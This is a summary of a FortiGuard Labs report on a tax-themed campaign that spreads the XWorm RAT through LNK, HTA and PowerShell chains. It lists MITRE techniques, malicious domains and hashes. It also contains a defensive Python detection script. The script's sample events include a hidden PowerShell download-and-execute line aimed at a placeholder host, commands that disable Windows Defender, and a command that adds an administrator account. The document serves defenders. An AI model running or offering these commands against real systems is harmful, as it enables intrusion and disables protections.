Deja Vu All Over Again: Tax Scammers at Large | FortiGuard Labs

Fortinet FortiGuard Labs details a tax-season campaign delivering the XWorm RAT via malicious tax documents, LNK files, and HTA/PowerShell chains. The article describes the infection flow, defense-evasion tricks, multiple variants, and indicators to help defenders identify and block these scams. #XWorm #AsyncRAT

Keypoints

  • The campaign uses tax-season themes and open directories (e.g., www.farmaciasmv.com/citrix/2022%20tax_documents.zip) to host malicious payloads.
  • The ZIP contains decoy Excel/PDF files and a malicious LNK that launches a chain (LNK → note.hta → PowerShell download) to install payloads.
  • The infection chain leverages HTA/PowerShell and VBScript components to download and execute further payloads from remote hosts.
  • FortiGuard observed an AMSI bypass and extensive Windows Defender configuration changes intended to hamper security tooling (exclusions, ASR rules, firewall, and service controls).
  • XWorm is a commodity RAT with HVNC capabilities, screen capture, keylogging, and file encryption features.
  • Additional tax-themed variants (Mary tax docs.pdf.lnk, Wilson tax_docs.pdf.lnk, TaxReturn2022 artifacts) indicate multiple campaigns and templates.
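The LNK → note.hta → PowerShell chain and the Defender tampering summarised above are the stages a defender can look for in process-creation telemetry. The following is an added detection sketch (not code from the FortiGuard article) run over constructed sample events; the field names, paths and the example.invalid host are assumptions, not values from the page.

```python
"""Triage constructed process-creation events for the HTA/PowerShell chain and
the Defender/account tampering described in the key points. Event fields
(parent, image, cmdline) are an assumed schema, not Sysmon's exact names."""
import re

# Constructed sample events modelled on the described chain (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\user\AppData\Local\Temp\note.hta"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/py.ps1')"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true; "
                "Add-MpPreference -ExclusionPath C:\\Users"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup Administrators System32 /add"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe 2022_tax_documents.txt"},  # benign control
]

RULES = [
    ("mshta spawning PowerShell (HTA -> PowerShell stage)",
     lambda e: e["parent"].lower().endswith("mshta.exe")
               and e["image"].lower().endswith("powershell.exe")),
    ("PowerShell fetching remote content (ingress tool transfer)",
     lambda e: e["image"].lower().endswith("powershell.exe")
               and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
                             e["cmdline"], re.I)),
    ("Defender tampering via Set-/Add-MpPreference",
     lambda e: re.search(r"(set|add)-mppreference", e["cmdline"], re.I)
               and re.search(r"-exclusion|-disable", e["cmdline"], re.I)),
    ("local account added to a privileged group",
     lambda e: re.search(r"\bnet1?(\.exe)?\s+localgroup\s+"
                         r"(administrators|\"remote desktop users\")\s+\S+\s+/add",
                         e["cmdline"], re.I)),
]

def triage(events):
    """Return (rule_name, cmdline) for every event matching a rule, in event order."""
    return [(name, e["cmdline"]) for e in events for name, pred in RULES if pred(e)]

if __name__ == "__main__":
    for name, cmd in triage(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

A single mshta → powershell hit is already rare on a workstation; the value of the script is that all four stages correlate on one host within seconds, which is the signal worth alerting on.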

MITRE Techniques

  • [T1566.002] Spearphishing Link – Lure victims with malicious links in spam emails; “victims were likely lured via malicious links in spam emails.”
  • [T1218.005] Signed Binary Proxy Execution: Mshta – Use MSHTA.exe to execute nested PowerShell actions; “MSHTA.exe to run PowerShell code to run py.ps1.”
  • [T1059.001] PowerShell – PowerShell used to download and execute remote payloads; “PowerShell to download another remote file hosted on …”
  • [T1059.005] Visual Basic – VBScript used in the chain to create and run scripts; “test.vbs creates %usertemp%Note.txt …”
  • [T1059.007] HTML Application – HTA-based components drive further execution; “note.hta uses PowerShell to download another remote file.”
  • [T1105] Ingress Tool Transfer – The dropper/downloader retrieves remote payloads; “downloads another remote file …”
  • [T1055] Process Injection – Reflective loading to inject XWorm into memory; “loads a binary into memory that injects XWorm RAT.”
  • [T1562.001] Impair Defenses – AMSI bypass and related bypass techniques; “AMSI bypass”
  • [T1562.004] Impair Defenses – Disables Defender features and firewall; “Disables Windows Defender features”
  • [T1136] Create Account – Creates a new user “System32” and adds it to the Administrators and Remote Desktop Users groups; “Creates a user named ‘System32’ …”
  • [T1021] Remote Services – HVNC usage to control machines; “abusing Virtual Network Computing (VNC), HVNC.”
  • [T1486] Data Encrypted for Impact – Encrypts files as part of the payload behavior; “encrypts files”
  • [T1113] Screen Capture – Capability to take screenshots of the compromised host; “taking screenshots”
  • [T1115] Clipboard Data – Clipboard data theft feature for crypto addresses; “clipboard for crypto wallet address swapping”
  • [T1056.001] Keyboard Capture – Keylogging functionality to steal credentials and data; “keylogging”

Indicators of Compromise

  • [File IOCs] – 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0, a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a, and 2 more hashes
  • [Network IOCs] – farmaciasmv.com, datacenter002.myftp.biz

Read more: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large